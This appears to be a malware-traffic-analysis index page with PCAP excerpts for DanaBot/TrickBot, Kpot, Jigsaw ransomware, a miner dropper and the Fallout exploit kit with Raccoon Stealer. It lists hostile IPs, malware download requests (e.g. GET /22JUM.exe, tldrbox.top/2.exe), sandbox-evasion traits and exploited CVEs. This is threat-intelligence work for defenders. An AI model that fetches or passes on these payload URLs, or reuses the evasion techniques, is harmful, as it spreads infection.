DanaBot TrickBot Malware PCAP File Download Traffic Analysis 185.45.193.50 193.34.166.247

Hostile IPs: 176.123.7.51 185.45.193.50 193.34.166.247 95.163.181.123 Tags: DanaBot  Gozi  Quakbot  Trickbot  2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1 E..!..@…(S . ..{.3.B.P..?q….P.@).F..GET /22JUM.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=202587- Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT If-Range: “293800-5a6d31663c571” Host: 176.123.7.51 Connection: Keep-Alive 2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0 E..(<.@.-.E(.{.3 . ..P.B……AjP…u%…….. 2020-05-29 21:10:54.846062 IP […]

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What Kryptik virus can do? Executable code extraction Attempts to connect to a dead IP:Port (1 unique times) Creates RWX memory A process attempted to delay the analysis task. Expresses interest in specific running processes HTTP traffic contains suspicious features which may be indicative of malware related traffic Performs some HTTP requests The binary likely contains encrypted or compressed data. Detects Sandboxie through the presence of a library Checks for the presence of known windows from debuggers and forensic tools Attempts to repeatedly call a single API many times in order to delay analysis time Steals private information from local Internet […]

Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Avast FileRepMetagen [Malware] AVG FileRepMetagen [Malware] Avira (no cloud) Malwarebytes Ransom.Jigsaw McAfee-GW-Edition BehavesLike.Win32.Ransomware.dc Microsoft Trojan:Win32/Occamy.C When executed this ransomware has NO C2 it uses an e-mail address with directions as pictured below: 2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)E..W..@.@.if..V…V..5…C.p/…………service-updater.hopto.org…………..;..)a..2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0E..4f^@…H…V.)a…!.Pp……… ..s…………..2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0E..4Q.@.*..p)a….V..P.!zMk.p….. ……..<…….. 2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0E..(f_@…H…V.)a…!.Pp…zMk.P.@………..2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]

Malware Dropper tldrbox.top Loads Crypto Currency Miner PCAP Download Traffic Sample

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1E…]R@….J..V.]~<m._.P+…80..P.@t….GET /2.exe HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)Accept-Encoding: gzip, deflateHost: tldrbox.topConnection: Keep-Alive 2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0E..(..@.-..A]~ 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OKE…..@.-…]~<m..V..P._80..+…P… T..HTTP/1.1 200 OKServer: nginx/1.16.1Date: Mon, 13 Apr 2020 04:29:15 GMTContent-Type: application/octet-streamContent-Length: 556032Last-Modified: Wed, 08 Apr 2020 02:44:48 GMTConnection: keep-aliveETag: […]

Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVE’s as of 4-8-2020: Vulnerabilities CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop – Ransomware GandCrab 5 – Ransomware Kraken Cryptor – Ransomware GandCrab – Ransomware Maze – Ransomware Fake Globe – Ransomware Minotaur – Ransomware Matrix – Ransomware Sodinokibi – Ransomware Raccoon Stealer – This sample (also known as Legion, Mohazo, and Racealer) is high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues. 2020-02-24 19:34:02.651895 IP […]